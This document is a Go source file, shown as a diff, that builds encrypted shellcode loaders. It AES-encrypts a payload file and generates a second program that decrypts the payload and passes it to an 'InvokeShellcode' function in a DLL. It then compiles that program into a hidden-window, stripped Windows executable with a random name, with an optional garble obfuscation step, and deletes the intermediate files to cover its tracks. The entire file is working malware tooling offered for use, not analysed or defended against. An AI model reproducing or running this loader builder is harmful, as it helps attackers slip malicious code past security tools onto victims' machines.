| 1 | + | package main |
| 2 | + | |
| 3 | + | /* |
| 4 | + | CopyRight: A10nggg/Yeuoly |
| 5 | + | */ |
| 6 | + | |
| 7 | + | import ( |
| 8 | + | "crypto/aes" |
| 9 | + | "crypto/cipher" |
| 10 | + | "encoding/base64" |
| 11 | + | "fmt" |
| 12 | + | "io" |
| 13 | + | "io/ioutil" |
| 14 | + | rrand "math/rand" |
| 15 | + | "path/filepath" |
| 16 | + | |
| 17 | + | "crypto/rand" |
| 18 | + | "os" |
| 19 | + | "os/exec" |
| 20 | + | "time" |
| 21 | + | ) |
| 22 | + | |
| 23 | + | func Readcode(filename string) string { |
| 24 | + | data, err := ioutil.ReadFile(filename) |
| 25 | + | if err != nil { |
| 26 | + | fmt.Println("出现错误了。", err) |
| 27 | + | } |
| 28 | + | return string(data) |
| 29 | + | } |
| 30 | + | |
| 31 | + | var ( |
| 32 | + | codes = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" |
| 33 | + | codeLen = len(codes) |
| 34 | + | ) |
| 35 | + | |
| 36 | + | func RandNewStr(len int) string { //随机生成deskey |
| 37 | + | data := make([]byte, len) |
| 38 | + | rrand.Seed(time.Now().UnixNano()) |
| 39 | + | for i := 0; i < len; i++ { |
| 40 | + | idx := rrand.Intn(codeLen) |
| 41 | + | data[i] = byte(codes[idx]) |
| 42 | + | } |
| 43 | + | return string(data) |
| 44 | + | } |
| 45 | + | |
| 46 | + | func encrypt(key []byte, text string) (string, error) { |
| 47 | + | // 创建一个新的 Cipher.Block 对象 |
| 48 | + | block, err := aes.NewCipher(key) |
| 49 | + | if err != nil { |
| 50 | + | return "", err |
| 51 | + | } |
| 52 | + | |
| 53 | + | // 生成随机的初始化向量 |
| 54 | + | iv := make([]byte, aes.BlockSize) |
| 55 | + | if _, err := io.ReadFull(rand.Reader, iv); err != nil { |
| 56 | + | return "", err |
| 57 | + | } |
| 58 | + | |
| 59 | + | // 创建一个加密器对象 |
| 60 | + | ciphertext := make([]byte, aes.BlockSize+len(text)) |
| 61 | + | copy(ciphertext[:aes.BlockSize], iv) |
| 62 | + | stream := cipher.NewCFBEncrypter(block, iv) |
| 63 | + | stream.XORKeyStream(ciphertext[aes.BlockSize:], []byte(text)) |
| 64 | + | |
| 65 | + | // 返回加密后的数据,包括 IV 和密文 |
| 66 | + | return base64.URLEncoding.EncodeToString(ciphertext), nil |
| 67 | + | } |
| 68 | + | |
| 69 | + | func main() { |
| 70 | + | if len(os.Args) < 2 { |
| 71 | + | fmt.Println("请输入加密的文件名称!") |
| 72 | + | } else { |
| 73 | + | filename := os.Args[1] |
| 74 | + | aeskey := RandNewStr(32) |
| 75 | + | code := Readcode(filename) |
| 76 | + | newcode, err := encrypt([]byte(aeskey), code) |
| 77 | + | if err != nil { // Encryption failed! |
| 78 | + | fmt.Printf("%v", err) |
| 79 | + | } |
| 80 | + | //ncode := hex.EncodeToString([]byte(newcode)) //hex编码 |
| 81 | + | SourceCode := fmt.Sprintf(`package main |
| 82 | + | |
| 83 | + | import ( |
| 84 | + | "crypto/aes" |
| 85 | + | "crypto/cipher" |
| 86 | + | "encoding/base64" |
| 87 | + | "fmt" |
| 88 | + | "syscall" |
| 89 | + | "unsafe" |
| 90 | + | ) |
| 91 | + | |
| 92 | + | func decrypt(key []byte, cryptoText string) (string, error) { |
| 93 | + | // 解码密文 |
| 94 | + | ciphertext, err := base64.URLEncoding.DecodeString(cryptoText) |
| 95 | + | if err != nil { |
| 96 | + | return "", err |
| 97 | + | } |
| 98 | + | |
| 99 | + | // 创建一个新的 Cipher.Block 对象 |
| 100 | + | block, err := aes.NewCipher(key) |
| 101 | + | if err != nil { |
| 102 | + | return "", err |
| 103 | + | } |
| 104 | + | |
| 105 | + | // 提取初始化向量 |
| 106 | + | iv := ciphertext[:aes.BlockSize] |
| 107 | + | ciphertext = ciphertext[aes.BlockSize:] |
| 108 | + | |
| 109 | + | // 创建一个解密器对象 |
| 110 | + | plaintext := make([]byte, len(ciphertext)) |
| 111 | + | stream := cipher.NewCFBDecrypter(block, iv) |
| 112 | + | stream.XORKeyStream(plaintext, ciphertext) |
| 113 | + | |
| 114 | + | // 返回解密后的明文 |
| 115 | + | return string(plaintext), nil |
| 116 | + | } |
| 117 | + | func IntPtr(n int) uintptr { |
| 118 | + | return uintptr(n) |
| 119 | + | } |
| 120 | + | |
| 121 | + | func Lib(decoded []byte) { |
| 122 | + | lib := syscall.NewLazyDLL("1.dll") |
| 123 | + | proc := lib.NewProc("InvokeShellcode") |
| 124 | + | proc.Call((uintptr)(unsafe.Pointer(&decoded[0])), IntPtr(len(decoded))) |
| 125 | + | } |
| 126 | + | |
| 127 | + | |
| 128 | + | func main() { |
| 129 | + | |
| 130 | + | //if shouldExit() { |
| 131 | + | key := []byte("%v") // 256-bit AES 密钥 |
| 132 | + | cryptoText := "%v" |
| 133 | + | // 解密加密后的字符串 |
| 134 | + | decryptedText, err := decrypt(key, cryptoText) |
| 135 | + | if err != nil { |
| 136 | + | fmt.Println(err) |
| 137 | + | return |
| 138 | + | } |
| 139 | + | |
| 140 | + | Lib([]byte(decryptedText)) |
| 141 | + | // } |
| 142 | + | } |
| 143 | + | `, aeskey, newcode) |
| 144 | + | f, _ := os.Create("doing.go") |
| 145 | + | _, _ = f.Write([]byte(SourceCode)) |
| 146 | + | f.Close() |
| 147 | + | scriptPath, err := os.Getwd() |
| 148 | + | if err != nil { |
| 149 | + | fmt.Println(err) |
| 150 | + | return |
| 151 | + | } |
| 152 | + | randname := RandStr(4) + ".exe" |
| 153 | + | batfile, _ := os.Create("doing.bat") |
| 154 | + | // _, _ = batfile.Write([]byte("garble -tiny -literals -seed=random build -o " + randname + " -trimpath -ldflags=\"-w -s\" doing.go")) |
| 155 | + | _, _ = batfile.Write([]byte("go build -o " + randname + " -trimpath -ldflags=\"-w -s -H windowsgui\" doing.go")) |
| 156 | + | |
| 157 | + | batfile.Close() |
| 158 | + | |
| 159 | + | time.Sleep(time.Duration(1) * time.Second) |
| 160 | + | cmd := exec.Command(filepath.Join(scriptPath, "doing.bat")) |
| 161 | + | |
| 162 | + | s := cmd.Start() |
| 163 | + | fmt.Printf("%v", s) |
| 164 | + | time.Sleep(time.Duration(1) * time.Second) |
| 165 | + | |
| 166 | + | os.RemoveAll("doing.bat") |
| 167 | + | os.RemoveAll("doing.go") |
| 168 | + | |
| 169 | + | } |
| 170 | + | } |
| 171 | + | func readshell(mumafile string) string { |
| 172 | + | info, _ := ioutil.ReadFile(mumafile) |
| 173 | + | |
| 174 | + | //compileRegex := regexp.MustCompile("= \"(.*?)\";") |
| 175 | + | //matchArr := compileRegex.FindStringSubmatch(string(info)) |
| 176 | + | return string(info) |
| 177 | + | } |
| 178 | + | |
| 179 | + | func RandStr(length int) string { |
| 180 | + | str := "ABCDEFGHIJKLMNOPQRSTUVWXYZ" |
| 181 | + | bytes := []byte(str) |
| 182 | + | result := []byte{} |
| 183 | + | rrand.Seed(time.Now().UnixNano() + int64(rrand.Intn(100))) |
| 184 | + | for i := 0; i < length; i++ { |
| 185 | + | result = append(result, bytes[rrand.Intn(len(bytes))]) |
| 186 | + | } |
| 187 | + | return string(result) |
| 188 | + | } |
| 189 | + | |